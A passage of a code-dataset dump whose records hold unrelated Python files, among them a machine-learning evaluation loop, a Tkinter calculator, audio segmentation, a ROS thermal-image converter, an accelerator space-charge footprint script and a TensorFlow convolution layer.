dev_loss_valence / np.mean(moving_metric_valence[ep - 10:ep]) * 10\n rate_stress = dev_acc / (np.mean(moving_metric_stress[ep - 10:ep]) + 1e-5) * 10\n total_exp = np.exp(rate_active) + np.exp(rate_valence) + np.exp(rate_stress)\n sample_distribution = [np.exp(rate_active) / total_exp, np.exp(rate_valence) / total_exp, 1 - np.exp(rate_active) / total_exp - np.exp(rate_valence) / total_exp]\n\n # do test for classification\n if ep % eval_every == 0:\n idx = 0\n model.set_mode('classify')\n model.eval()\n total_loss = 0.\n eval_preds = np.array([])\n n_batch = 0\n while idx < n_test:\n test_batch_a = test_a[idx:(idx + test_batch_size)].to('cuda')\n\n test_batch_l = test_l[idx:(idx + test_batch_size)].to('cuda')\n test_batch_ty = test_token_type_ids[idx:(idx + test_batch_size)].to('cuda')\n test_batch_am = test_attention_mask[idx:(idx + test_batch_size)].to('cuda')\n # time.sleep(20)\n # exit()\n test_ans = test_labels[idx:(idx + test_batch_size)].to('cuda')\n\n loss, logits = model(input_ids=test_batch_l,\n token_type_ids=test_batch_ty,\n attention_mask=test_batch_am,\n labels=test_ans,\n audio_features=test_batch_a)\n if TRIconfig.mode == 'regression':\n mse = loss.data.cpu().numpy()\n total_loss += mse\n else:\n _, batch_eval_preds = logits.data.cpu().max(1)\n # print(batch_eval_preds, test_ans)\n eval_preds = np.concatenate((eval_preds, batch_eval_preds), axis=-1)\n # test_pred = torch.squeeze(test_pred, dim=1)\n '''if idx == 0:\n print(logits, test_ans)'''\n\n idx += test_batch_size\n torch.cuda.empty_cache()\n n_batch += 1.\n\n del test_batch_l, test_batch_ty, test_batch_am, test_ans, test_batch_a\n torch.cuda.empty_cache()\n # metrics\n if TRIconfig.mode == 'regression':\n print('evaluation rmse: %f' % (total_loss / n_batch) ** 0.5)\n else:\n precison, recall, fscore, support = precision_recall_fscore_support(test_labels.cpu().numpy(), eval_preds,\n labels=[1], average=None)\n # print('saving:')\n print('=============stress metrics===================')\n print(float(sum(eval_preds == test_labels.cpu().numpy())) / len(eval_preds))\n print(precison, recall, fscore, support)\n # print('saving:')\n\n '''model_dir = save_dir + '%d' % (ep+1)\n os.mkdir(model_dir)\n model.save_pretrained(model_dir)'''","sub_path":"late_fusion_multi_task_dynamic.py","file_name":"late_fusion_multi_task_dynamic.py","file_ext":"py","file_size_in_byte":16222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"203767671","text":"from tkinter import *\n\ndef btnClick(numbers):\n global operator\n operator = operator + str(numbers)\n text_Input.set(operator)\n\n\ndef btnClearDisplay():\n global operator\n operator = ''\n text_Input.set(operator)\n\n\ndef btnDeleteDisplay():\n global operator\n operator = str(operator[0:-1])\n text_Input.set(operator)\n\n\ndef btnEqualsInput():\n try:\n global operator\n sumup = str(eval(operator))\n text_Input.set(sumup)\n operator = ''\n\n except ZeroDivisionError:\n text_Input.set('Error')\n\n\n\ncal = Tk()\ncal.title('Калькулятор')\noperator = ''\ntext_Input = StringVar()\ncal.eval('tk::PlaceWindow %s center' % cal.winfo_pathname(cal.winfo_id()))\n\ntxtDisplay = Entry(cal, font=('arial', 20, 'bold'), textvariable=text_Input, bd=45, insertwidth=5,\n bg='tomato', justify='right').grid(columnspan=4)\nbtn7 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='7', bg='tomato', command=lambda: btnClick(7)).grid(row=1, column=0)\nbtn8 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='8', bg='tomato', command=lambda: btnClick(8)).grid(row=1, column=1)\nbtn9 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='9', bg='tomato', command=lambda: btnClick(9)).grid(row=1, column=2)\nAddition = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='+', bg='tomato', command=lambda: btnClick('+')).grid(row=1, column=3)\n# Next row\nbtn4 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='4', bg='tomato', command=lambda: btnClick(4)).grid(row=2, column=0)\nbtn5 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='5', bg='tomato', command=lambda: btnClick(5)).grid(row=2, column=1)\nbtn6 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='6', bg='tomato', command=lambda: btnClick(6)).grid(row=2, column=2)\nSubtraction = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='-', bg='tomato', command=lambda: btnClick('-')).grid(row=2, column=3)\n# Next row\nbtn1 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='1', bg='tomato', command=lambda: btnClick(1)).grid(row=3, column=0)\nbtn2 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='2', bg='tomato', command=lambda: btnClick(2)).grid(row=3, column=1)\nbtn3 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='3', bg='tomato', command=lambda: btnClick(3)).grid(row=3, column=2)\nMultiply = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='*', bg='tomato', command=lambda: btnClick('*')).grid(row=3, column=3)\n# Next row\nbtn0 = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='0', bg='tomato', command=lambda: btnClick(0)).grid(row=4, column=0)\nbtnClear = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='C', bg='tomato', command=btnClearDisplay).grid(row=4, column=1)\nbtnd = Button(cal, padx=22, pady=20, bd=5, fg='black', font=('arial', 20, 'bold'),\n text='<', bg='tomato', command=btnDeleteDisplay).grid(row=4, column=2)\nDivison = Button(cal, padx=22, pady=16, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='/', bg='tomato', command=lambda: btnClick('/')).grid(row=4, column=3)\n# Next row\nbtnEquals = Button(cal, padx=170, pady=10, bd=8, fg='black', font=('arial', 20, 'bold'),\n text='=', bg='tomato', command=btnEqualsInput).grid(row=5, columnspan=4)\n\ncal.mainloop()","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"92766007","text":"n = 16 #n진법\r\nt = 16#미리 구할 숫자의 갯수\r\nm = 2 #게임에 참가하는 인원\r\np = 2 #튜브의 순서\r\n\r\nnum = ''\r\nresult = ''\r\n\r\nfor i in range(60): # n진수를 출력할 때 나오는 앞 두자리를 지우고 저장해야한다\r\n\r\n if(n == 2):\r\n \r\n a = str(bin(i))\r\n a = a.replace(\"0b\",\"\")\r\n num += a\r\n \r\n if(n == 8):\r\n \r\n a = str(oct(i))\r\n a = a.replace(\"0o\",\"\")\r\n num += a\r\n\r\n if(n == 10):\r\n\r\n num += str(i)\r\n\r\n if(n == 16):\r\n \r\n a = str(hex(i))\r\n a = a.replace(\"0x\",\"\")\r\n num += a\r\n\r\narr = list(num)\r\n\r\nfor i in range(t):\r\n result += arr[(p-1)+(i*m)]\r\n\r\nprint(result)\r\n","sub_path":"카카오 2018 2차/kakao1.py","file_name":"kakao1.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"620973566","text":"import librosa as lr\nimport numpy as np\nimport SoundMusic as sm\nfrom SoundMusic.sound import SoundObject\n\nMIN_DB = 0\nMAX_DB = 210\nMIN_LEN = 0.5\nMAX_LEN = 5.0\n\ndef extract(so, min_db, max_db, min_len, max_len):\n # Recursively search for the best threshold.\n samples = so.samples\n sr = sm.sound.SAMPLE_RATE\n if abs(min_db - max_db) < 2.0:\n segments = lr.effects.split(samples, top_db=max_db)\n segments = [(s[0], s[1] - 1) for s in segments if sr * max_len > abs(s[0] - s[1]) > sr * min_len]\n return segments\n \n s1 = lr.effects.split(samples, top_db=(min_db + (max_db - min_db) * (1 / 4)))\n s1 = [(s[0], s[1] - 1) for s in s1 if sr * max_len > abs(s[0] - s[1]) > sr * min_len]\n s2 = lr.effects.split(samples, top_db=(min_db + (max_db - min_db) * (3 / 4)))\n s2 = [(s[0], s[1] - 1) for s in s2 if sr * max_len > abs(s[0] - s[1]) > sr * min_len]\n s3 = lr.effects.split(samples, top_db=(min_db + (max_db - min_db) / 2))\n s3 = [(s[0], s[1] - 1) for s in s3 if sr * max_len > abs(s[0] - s[1]) > sr * min_len]\n \n if len(s3) > len(s1) and len(s3) > len(s2):\n return extract(so, min_db + (max_db - min_db) * (1 / 4),\n min_db + (max_db - min_db) * (3 / 4), min_len, max_len)\n elif len(s1) > len(s2):\n return extract(so, min_db, min_db + (max_db - min_db) / 2, min_len, max_len)\n elif len(s1) < len(s2):\n return extract(so, min_db + (max_db - min_db) / 2, max_db, min_len, max_len)\n else:\n t1 = extract(so, min_db, min_db + (max_db - min_db) / 2,min_len, max_len)\n t2 = extract(so, min_db + (max_db - min_db) / 2, max_db, min_len, max_len)\n if len(t1) >= len(t2):\n return t1\n else:\n return t2\n\ndef get_sounds(so, min_db=None, max_db=None, min_len=None, max_len=None):\n global MIN_DB, MAX_DB, MIN_LEN, MAX_LEN\n min_db = min_db or MIN_DB\n max_db = max_db or MAX_DB\n min_len = min_len or MIN_LEN\n max_len = max_len or MAX_LEN\n segments = extract(so, min_db, max_db, min_len, max_len)\n lso = []\n samples = so.samples\n for s in segments:\n segment_samples = samples[s[0]:s[1]]\n nso = SoundObject(segment_samples)\n lso.append(nso)\n return lso\n","sub_path":"src/SoundMusic/extraction.py","file_name":"extraction.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"106562157","text":"t = int(input())\n\nfor c in range(t):\n\ts = input()\n\tout = \"\"\n\tfor ch in s:\n\t\tif ch >= out[:1]:\n\t\t\tout = ch + out\n\t\telse:\n\t\t\tout = out + ch\n\tprint(\"Case #\" + str(c + 1) + \": \" + out)\n","sub_path":"codes/CodeJamCrawler/16_1_1/blesswin/thelastword.py","file_name":"thelastword.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"240066481","text":"#!/usr/bin/env python\nimport rospy\nimport cv2\n\nimport struct\nfrom std_msgs.msg import UInt8MultiArray\nfrom sensor_msgs.msg import Image\nimport numpy as np\nfrom math import sqrt\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom std_msgs.msg import Header\n\nclass thermal_array_converter:\n\tdef __init__(self):\n\t\trospy.init_node('thermal_array_converter')\n\t\trospy.Subscriber('/thermal_0u', UInt8MultiArray, self.convert_data, callback_args=(0), queue_size=10)\n\t\trospy.Subscriber('/thermal_1u', UInt8MultiArray, self.convert_data, callback_args=(1), queue_size=10)\n\t\trospy.Subscriber('/thermal_2u', UInt8MultiArray, self.convert_data, callback_args=(2), queue_size=10)\n\t\tself.pub0 = rospy.Publisher('/thermal_img_0', Image)\n\t\tself.pub1 = rospy.Publisher('/thermal_img_1', Image)\n\t\tself.pub2 = rospy.Publisher('/thermal_img_2', Image)\n\t\tself.bridge = CvBridge()\n\t\n\tdef convert_data(self, msg, args):\n\t\t# which sensor sent the message\n\t\tsensor = args\n\t\t# array of temp ints coming from ROS\n\t\tdata = np.zeros(768, dtype=np.uint8)\n\t\t# copy data from message packet\n\t\tfor i in range(len(msg.data)):\n\t\t\tdata[i] = struct.unpack(\"B\", msg.data[i])[0]\n\t\tsmall_pixels = np.reshape(data, (24, 32))\n\t\tscaling_matrix = np.ones((30,40))\n\t\tresult = np.kron(small_pixels, scaling_matrix)\n\t\tresult = np.uint8(result)\n\t\tbgrResult = cv2.merge((result, result, result))\n\t\t\n\t\tmsg_out = None\n\t\ttry:\n\t\t\tmsg_out = self.bridge.cv2_to_imgmsg(bgrResult, \"rgb8\")\n\t\texcept CvBridgeError as e:\n\t\t\trospy.logerr(e)\n\t\tif not msg_out == None:\n\t\t\tif args==0:\n\t\t\t\tself.pub0.publish(msg_out)\n\t\t\telif args==1:\n\t\t\t\tself.pub1.publish(msg_out)\n\t\t\telse:\n\t\t\t\tself.pub2.publish(msg_out)\n\n\nif __name__ == \"__main__\":\n\tthermal_array_converter()\n\trospy.spin()\n","sub_path":"scripts/gui/scripts/thermal_array_converter.py","file_name":"thermal_array_converter.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"315571329","text":"import discord\nfrom discord.ext import commands\n\n\nclass Errors(commands.Cog):\n def __init__(self, client):\n self.client: commands.Bot = client\n self.config = client.config\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx: commands.Context, error):\n if isinstance(error, commands.MissingRequiredArgument):\n await ctx.send(\"You had some missing arguments, here's the help page:\")\n await ctx.send_help(ctx.command)\n\n elif isinstance(error, commands.MissingPermissions):\n await ctx.send(\"You don't have permission to run that command\")\n\n elif isinstance(error, commands.BotMissingPermissions):\n await ctx.send(f\"The bot is missing the following permission:\\n{error.missing_perms}\")\n\n else:\n print(f\"{ctx.author.mention} had error '{error}' in command '{ctx.message.content}'\")\n\n\ndef setup(client):\n client.add_cog(Errors(client))\n","sub_path":"cogs/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"127378977","text":"# -*- coding: utf-8 -*-\n\"\"\"Wrapper for running EasyBayes-Filter in parallel, genome is split into windows\n\nisort:skip_file\n\"\"\"\n\nimport os\nimport sys\nimport textwrap\n\nfrom snakemake import shell\n\n# A hack is required for being able to import snappy_wrappers modules when in development mode.\n# TODO: is there a more elegant way?\nbase_dir = os.path.normpath(os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"..\"))\nsys.path.insert(0, base_dir)\n\n# pylint: disable=wrong-import-position\nfrom snappy_wrappers.wrapper_parallel import (\n ParallelVcfOutputBaseWrapper,\n ResourceUsage,\n gib,\n hours,\n) # noqa\n\n\nclass ParallelEasyBayesFilterWrapper(ParallelVcfOutputBaseWrapper):\n \"\"\"Parallel execution of somatic variant annotation: eb_filter``.\"\"\"\n\n inner_wrapper = \"eb_filter\"\n step_name = \"somatic_variant_filtration\"\n tool_name = \"eb_filter\"\n\n def __init__(self, snakemake):\n super().__init__(snakemake)\n self.job_resources = ResourceUsage(\n cores=2,\n memory=gib(8.0 * self.get_job_mult_memory()),\n duration=hours(4 * self.get_job_mult_time()),\n )\n self.merge_resources = ResourceUsage(\n cores=2,\n memory=gib(2.0 * self.get_merge_mult_memory()),\n duration=hours(4 * self.get_merge_mult_time()),\n )\n\n def construct_parallel_rules(self):\n \"\"\"Construct the rules for parallel processing to generate.\"\"\"\n for jobno, region in enumerate(self.get_regions()):\n params = dict(self.snakemake.params)\n params.setdefault(\"args\", {}).update({\"interval\": region.human_readable(False)})\n output = {\n key: \"job_out.{jobno}.d/out/tmp_{jobno}.{ext}\".format(jobno=jobno, ext=ext)\n for key, ext in self.key_ext.items()\n }\n vals = {\n \"input_vcf\": repr(\n os.path.realpath(os.path.join(self.main_cwd, self.snakemake.input.vcf))\n ),\n \"input_bam\": repr(\n os.path.realpath(os.path.join(self.main_cwd, self.snakemake.input.bam))\n ),\n \"input_txt\": repr(\n os.path.realpath(os.path.join(self.main_cwd, self.snakemake.input.txt))\n ),\n \"jobno\": jobno,\n \"params\": repr(params),\n \"output\": repr(output),\n \"wrapper_prefix\": \"file://\" + self.wrapper_base_dir,\n \"inner_wrapper\": self.inner_wrapper,\n \"resources\": repr(self.res_converter(self.job_resources).to_res_dict()),\n }\n yield textwrap.dedent(\n r\"\"\"\n rule chunk_{jobno}:\n input:\n vcf={input_vcf},\n bam={input_bam},\n txt={input_txt},\n output:\n touch(\"job_out.{jobno}.d/.done\"),\n **{output}\n params:\n **{params}\n wrapper: '{wrapper_prefix}/snappy_wrappers/wrappers/{inner_wrapper}'\n\n\n cluster_config['chunk_{jobno}'] = {resources}\n \"\"\"\n ).format(**vals).lstrip()\n\n\n# Kick off execution using the wrapper class defined above.\nParallelEasyBayesFilterWrapper(snakemake).run().shutdown_logging()\n\n# Compute MD5 sums of logs.\nshell(\n r\"\"\"\nmd5sum {snakemake.log.log} >{snakemake.log.log_md5}\n\"\"\"\n)\n","sub_path":"snappy_wrappers/wrappers/eb_filter_par/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"566525016","text":"import pathlib\nimport json\nimport numpy as np\n\nimport xobjects as xo\nimport xline as xl\nimport xpart as xp\nimport xtrack as xt\nimport xfields as xf\n\nfname_sequence = ('../../test_data/sps_w_spacecharge/'\n 'line_with_spacecharge_and_particle.json')\n\nfname_optics = ('../../test_data/sps_w_spacecharge/'\n 'optics_and_co_at_start_ring.json')\n\nseq_name = 'sps'\nbunch_intensity = 1e11/3\nsigma_z = 22.5e-2/3\nneps_x=2.5e-6\nneps_y=2.5e-6\nn_part=int(1e6)\nrf_voltage=3e6\nnum_turns=32\n\nmode = 'frozen'\nmode = 'quasi-frozen'\nmode = 'pic'\n\n####################\n# Choose a context #\n####################\n\n#context = xo.ContextCpu()\ncontext = xo.ContextCupy()\n#context = xo.ContextPyopencl('0.0')\n\n_buffer = context.new_buffer()\n\nprint(context)\n\n##################\n# Get a sequence #\n##################\n\nwith open(fname_sequence, 'r') as fid:\n input_data = json.load(fid)\nsequence = xl.Line.from_dict(input_data['line'])\n\nfirst_sc = sequence.elements[1]\nsigma_x = first_sc.sigma_x\nsigma_y = first_sc.sigma_y\n\n##########################\n# Configure space-charge #\n##########################\n\nif mode == 'frozen':\n pass # Already configured in line\nelif mode == 'quasi-frozen':\n xf.replace_spaceharge_with_quasi_frozen(\n sequence, _buffer=_buffer,\n update_mean_x_on_track=True,\n update_mean_y_on_track=True)\nelif mode == 'pic':\n pic_collection, all_pics = xf.replace_spaceharge_with_PIC(\n _context=context, sequence=sequence,\n n_sigmas_range_pic_x=8,\n n_sigmas_range_pic_y=8,\n nx_grid=256, ny_grid=256, nz_grid=100,\n n_lims_x=7, n_lims_y=3,\n z_range=(-3*sigma_z, 3*sigma_z))\nelse:\n raise ValueError(f'Invalid mode: {mode}')\n\n########################\n# Get optics and orbit #\n########################\n\nwith open(fname_optics, 'r') as fid:\n ddd = json.load(fid)\npart_on_co = xp.Particles.from_dict(ddd['particle_on_madx_co'])\nRR = np.array(ddd['RR_madx'])\n\n\n#################\n# Build Tracker #\n#################\ntracker = xt.Tracker(_buffer=_buffer,\n sequence=sequence)\n\n####################################\n# Generate particles for footprint #\n####################################\n\npart = xp.generate_matched_gaussian_bunch(\n num_particles=n_part, total_intensity_particles=bunch_intensity,\n nemitt_x=neps_x, nemitt_y=neps_y, sigma_z=sigma_z,\n particle_on_co=part_on_co, R_matrix=RR,\n circumference=6911., alpha_momentum_compaction=0.0030777,\n rf_harmonic=4620, rf_voltage=rf_voltage, rf_phase=0)\n\nimport footprint\nr_max_sigma = 5\nN_r_footprint = 10\nN_theta_footprint = 8\nxy_norm = footprint.initial_xy_polar(\n r_min=0.3, r_max=r_max_sigma,\n r_N=N_r_footprint + 1,\n theta_min=0.05 * np.pi / 2,\n theta_max=np.pi / 2 - 0.05 * np.pi / 2,\n theta_N=N_theta_footprint)\n\nN_footprint = len(xy_norm[:, :, 0].flatten())\npart.x[:N_footprint] = sigma_x*xy_norm[:, :, 0].flatten()\npart.y[:N_footprint] = sigma_y*xy_norm[:, :, 1].flatten()\npart.px[:N_footprint] = 0.\npart.py[:N_footprint] = 0.\npart.zeta[:N_footprint] = 0.\npart._delta[:N_footprint] = 0.\npart._rpp[:N_footprint] = 0.\npart._rvv[:N_footprint] = 0.\n\nxtparticles = xt.Particles(_context=context, **part.to_dict())\n\n#########\n# Track #\n#########\nx_tbt = np.zeros((N_footprint, num_turns), dtype=np.float64)\ny_tbt = np.zeros((N_footprint, num_turns), dtype=np.float64)\nfor ii in range(num_turns):\n print(f'Turn: {ii}', end='\\r', flush=True)\n x_tbt[:, ii] = context.nparray_from_context_array(xtparticles.x[:N_footprint]).copy()\n y_tbt[:, ii] = context.nparray_from_context_array(xtparticles.y[:N_footprint]).copy()\n tracker.track(xtparticles)\n\n######################\n# Frequency analysis #\n######################\nimport NAFFlib\n\nQx = np.zeros(N_footprint)\nQy = np.zeros(N_footprint)\n\nfor i_part in range(N_footprint):\n Qx[i_part] = NAFFlib.get_tune(x_tbt[i_part, :])\n Qy[i_part] = NAFFlib.get_tune(y_tbt[i_part, :])\n\nQxy_fp = np.zeros_like(xy_norm)\n\nQxy_fp[:, :, 0] = np.reshape(Qx, Qxy_fp[:, :, 0].shape)\nQxy_fp[:, :, 1] = np.reshape(Qy, Qxy_fp[:, :, 1].shape)\n\nimport matplotlib.pyplot as plt\nplt.close('all')\n\nfig3 = plt.figure(3)\naxcoord = fig3.add_subplot(1, 1, 1)\nfootprint.draw_footprint(xy_norm, axis_object=axcoord, linewidth = 1)\naxcoord.set_xlim(right=np.max(xy_norm[:, :, 0]))\naxcoord.set_ylim(top=np.max(xy_norm[:, :, 1]))\n\nfig4 = plt.figure(4)\naxFP = fig4.add_subplot(1, 1, 1)\nfootprint.draw_footprint(Qxy_fp, axis_object=axFP, linewidth = 1)\naxFP.set_xlim(.1, .16)\naxFP.set_ylim(.18, .25)\naxFP.set_aspect('equal')\nfig4.suptitle(mode)\nplt.show()\n","sub_path":"examples/spacecharge/003_spacecharge_footprint.py","file_name":"003_spacecharge_footprint.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"638672565","text":"import sys\nimport pathlib\n\nimport zmq\nimport molsim_job_scheduler as mjs\n\nassert len(sys.argv) == 2\n\nqsub_file = pathlib.Path(sys.argv[1])\nassert qsub_file.exists()\n\nnodes = mjs.extract_nodes_from_qsub(qsub_file)\nassert nodes is not None\n\n# Check nodes format.\nmjs.parse_nodes(nodes)\n\ncontext = zmq.Context()\n\n# Socket to talk to server\nsocket = context.socket(zmq.REQ)\nsocket.connect(\"tcp://localhost:{}\".format(mjs.JobManipulator.PORT))\n\n# message = \"qas|qsubfile\"\nmessage = \"qas|\" + str(qsub_file.resolve())\nsocket.send(message.encode())\nprint(qsub_file)\nprint(socket.recv().decode(\"utf-8\"))\n","sub_path":"qas.py","file_name":"qas.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"517911335","text":"# -*- coding: utf8 -*-\r\n# author: ronniecao\r\nimport numpy\r\nimport math\r\nimport tensorflow as tf\r\nimport random\r\nimport src.layer.utils as utils\r\nfrom src.layer.batch_normal_layer import BatchNormalLayer\r\n\r\n\r\nclass ConvLayer:\r\n \r\n def __init__(self, y_size, x_size, y_stride, x_stride, n_filter, activation='relu',\r\n batch_normal=False, weight_decay=None, name='conv',\r\n input_shape=None, prev_layer=None):\r\n # params\r\n self.y_size = y_size\r\n self.x_size = x_size\r\n self.y_stride = y_stride\r\n self.x_stride = x_stride\r\n self.n_filter = n_filter\r\n self.activation = activation\r\n self.batch_normal = batch_normal\r\n self.weight_decay = weight_decay\r\n self.name = name\r\n self.ltype = 'conv'\r\n if prev_layer:\r\n self.prev_layer = prev_layer\r\n self.input_shape = prev_layer.output_shape\r\n elif input_shape:\r\n self.prev_layer = None\r\n self.input_shape = input_shape\r\n else:\r\n raise('ERROR: prev_layer or input_shape cannot be None!')\r\n \r\n # 计算感受野\r\n self.feel_field = [1, 1]\r\n self.feel_field[0] = min(self.input_shape[0], 1 + int((self.y_size+1)/2))\r\n self.feel_field[1] = min(self.input_shape[1], 1 + int((self.x_size+1)/2))\r\n prev_layer = self.prev_layer\r\n while prev_layer:\r\n if prev_layer.ltype == 'conv':\r\n self.feel_field[0] = min(prev_layer.input_shape[0], \r\n self.feel_field[0] + int((prev_layer.y_size+1)/2))\r\n self.feel_field[1] = min(prev_layer.input_shape[1], \r\n self.feel_field[1] + int((prev_layer.x_size+1)/2))\r\n elif prev_layer.ltype == 'pool':\r\n self.feel_field[0] = min(prev_layer.input_shape[0], \r\n self.feel_field[0] * int(prev_layer.y_size))\r\n self.feel_field[1] = min(prev_layer.input_shape[1], \r\n self.feel_field[1] * int(prev_layer.x_size))\r\n prev_layer = prev_layer.prev_layer\r\n \r\n self.leaky_scale = tf.constant(0.1, dtype=tf.float32)\r\n \r\n with tf.name_scope('%s_def' % (self.name)) as scope:\r\n # 权重矩阵\r\n numpy.random.seed(0)\r\n scale = math.sqrt(2.0 / (self.y_size * self.x_size * self.input_shape[2]))\r\n init_value = scale * numpy.random.normal(size=[\r\n self.y_size, self.x_size, self.input_shape[2], self.n_filter], loc=0.0, scale=1.0)\r\n self.weight = tf.Variable(init_value, dtype=tf.float32, name='weight')\r\n \r\n # batch normalization 技术的参数\r\n if self.batch_normal:\r\n self.batch_normal_layer = BatchNormalLayer(self.n_filter, name=name)\r\n else:\r\n # 偏置向量\r\n self.bias = tf.Variable(\r\n initial_value=tf.constant(0.0, shape=[self.n_filter]),\r\n name='bias')\r\n \r\n # 打印网络权重、输入、输出信息\r\n # calculate input_shape and output_shape\r\n self.output_shape = [\r\n int(self.input_shape[0]/self.y_stride),\r\n int(self.input_shape[1]/self.x_stride), \r\n self.n_filter]\r\n print('%-10s\\t%-25s\\t%-20s\\t%-20s\\t%s' % (\r\n self.name, \r\n '((%d, %d) / (%d, %d) * %d)' % (\r\n self.y_size, self.x_size, self.y_stride, self.x_stride, self.n_filter),\r\n '(%d, %d, %d)' % (\r\n self.input_shape[0], self.input_shape[1], self.input_shape[2]),\r\n '(%d, %d, %d)' % (\r\n self.output_shape[0], self.output_shape[1], self.output_shape[2]),\r\n '(%d, %d)' % (\r\n self.feel_field[0], self.feel_field[1])))\r\n self.calculation = self.output_shape[0] * self.output_shape[1] * \\\r\n self.output_shape[2] * self.input_shape[2] * self.y_size * self.x_size\r\n \r\n def get_output(self, input, is_training=True):\r\n with tf.name_scope('%s_cal' % (self.name)) as scope:\r\n # hidden states\r\n self.conv = tf.nn.conv2d(\r\n input=input, filter=self.weight, \r\n strides=[1, self.y_stride, self.x_stride, 1], padding='SAME', name='cal_conv')\r\n \r\n # batch normalization 技术\r\n if self.batch_normal:\r\n self.hidden = self.batch_normal_layer.get_output(self.conv, is_training=is_training)\r\n else:\r\n self.hidden = self.conv + self.bias\r\n \r\n # activation\r\n if self.activation == 'relu':\r\n self.output = tf.nn.relu(self.hidden)\r\n elif self.activation == 'tanh':\r\n self.output = tf.nn.tanh(self.hidden)\r\n elif self.activation == 'leaky_relu':\r\n self.output = self.leaky_relu(self.hidden)\r\n elif self.activation == 'sigmoid':\r\n self.output = tf.nn.sigmoid(self.hidden)\r\n elif self.activation == 'none':\r\n self.output = self.hidden\r\n \r\n # gradient constraint\r\n g = tf.get_default_graph()\r\n with g.gradient_override_map({\"Identity\": \"CustomClipGrad\"}):\r\n self.output = tf.identity(self.output, name=\"Identity\")\r\n \r\n return self.output\r\n \r\n def leaky_relu(self, input):\r\n output = tf.maximum(self.leaky_scale * input, input, name='leaky_relu')\r\n \r\n return output\r\n\r\n @tf.RegisterGradient(\"CustomClipGrad\")\r\n def _clip_grad(unused_op, grad):\r\n return tf.clip_by_value(grad, -1, 1)\r\n\r\n def random_normal(self, shape, mean=0.0, stddev=1.0):\r\n epsilon = 1e-5\r\n twopi = 2.0 * math.pi\r\n\r\n n_dims = 1\r\n for dim in shape:\r\n n_dims *= dim\r\n array = numpy.zeros((n_dims, ), dtype='float32')\r\n \r\n for i in range(int(n_dims/2)):\r\n u1 = 0.0\r\n while u1 < epsilon:\r\n u1 = random.random()\r\n u2 = random.random()\r\n z0 = math.sqrt(-2.0 * math.log(u1)) * math.cos(twopi * u2)\r\n z1 = math.sqrt(-2.0 * math.log(u1)) * math.sin(twopi * u2)\r\n array[2*i] = z0 * stddev + mean\r\n array[2*i+1] = z1 * stddev + mean\r\n\r\n if n_dims % 2 == 1:\r\n while u1 < epsilon:\r\n u1 = random.random()\r\n u2 = random.random()\r\n z0 = math.sqrt(-2.0 * math.log(u1)) * math.cos(twopi * u2)\r\n array[n_dims-1] = z0\r\n\r\n array = numpy.reshape(array, shape)\r\n\r\n return array\r\n\r\n def rand_normal(self, shape, mean=0.0, stddev=1.0):\r\n import pdfinsight.ai.yolo_tf.src.tools.pyolo as pyolo\r\n n_dims = 1\r\n for dim in shape:\r\n n_dims *= dim\r\n array = numpy.zeros((n_dims, ), dtype='float32')\r\n \r\n for i in range(n_dims):\r\n array[i] = pyolo.rand_normal()\r\n \r\n array = numpy.reshape(array, shape)\r\n \r\n return array\r\n","sub_path":"src/layer/conv_layer.py","file_name":"conv_layer.py","file_ext":"py","file_size_in_byte":7128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"394136996","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on:2018.1.13\nlinear regression V3\n@author: pengxu\n\"\"\"\nimport os, sys, time, logging\nimport pandas as pd\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nimport linear_regression as lr\n\nINDEX_ID = 'ID'\n\n\ndef dataframe_to_excel(data, savepath, name):\n #将数据按照excel保存,需要将INDEX_ID转化保存\n save_path_name = 